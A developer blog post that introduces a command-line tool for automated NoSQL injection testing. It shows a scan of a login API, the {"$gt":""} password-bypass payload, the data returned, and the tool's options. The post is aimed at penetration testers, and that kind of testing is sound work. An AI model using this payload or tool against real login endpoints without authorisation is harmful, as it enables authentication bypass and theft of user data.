DEV Community πŸ‘©β€πŸ’»πŸ‘¨β€πŸ’»

Igor Souza Martins
Igor Souza Martins

Posted on • Updated on

Making easier a NoSQLi pentest

Hello, everyone!

Today I've created a project which automates a NoSQLi pentest, but this is the first version and I ask for help in this project.

If you have an interest in helping a little project to become a large project to make our life as "security guys" more easier, please, send issues or send a PR.

So, how this project works?

With some info from a request, the "exploit" can test if the request parameters can be exploited with some payloads of NoSQLi.

Example to exploit an login API, where we have a POST request and we have a JSON data with user and pass:

[igor.martins automated]$ nosqli-checkr scan --host="https://nosql-checkr-test.herokuapp.com/api/v1/login" --data='{ "user": "wubba", "pass": "" }' --method="post" --params="pass" --error-message='{"success":false,"result":"user/pass not found"}'


 β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—      β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  
 β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— 
 β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• 
 β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–„β–„ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•   β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— 
 β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘     β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘ 
 β•šβ•β•  β•šβ•β•β•β•  β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•β•  β•šβ•β•β–€β–€β•β•  β•šβ•β•β•β•β•β•β• β•šβ•β•      β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β•β•  β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β• β•šβ•β•  β•šβ•β• 


βœ” Request finished
βœ” Response analyzed
βœ” https://nosql-checkr-test.herokuapp.com/api/v1/login is vulnerable

β„Ή Payload: {"$gt":""}
β„Ή Evil data 😈: {"user":"wubba","pass":{"$gt":""}}
β„Ή Data stoled:
{
    "success": true,
    "result": {
        "user": "wubba",
        "_id": "hVFQzFwVlMwCYFBT"
    }
}

The "exploit" test the param pass and find a payload {"$gt":""} which can exploit the NoSQL Injection flaw.

Parameters

  • -h or --host: Route URL. Ex: https://nosql-checkr-test.herokuapp.com/api/v1/login
  • -hr or --headers: Request headers. Ex: token:val or token:val;token2:val2
  • -d or --data: Request data: Ex: { "user": "wubba", "pass": "" }
  • -m or --method: Request method: Ex: post or POST
  • -p or --params: Request params which will be exploited: Ex: pass or user,pass
  • -e or --error-message: The default error message of request. Ex: {"success":false,"result":"user/pass not found"}

Github Project

Github Project

Top comments (0)

πŸŒ™ Dark Mode?!

Β 
Turn it on in Settings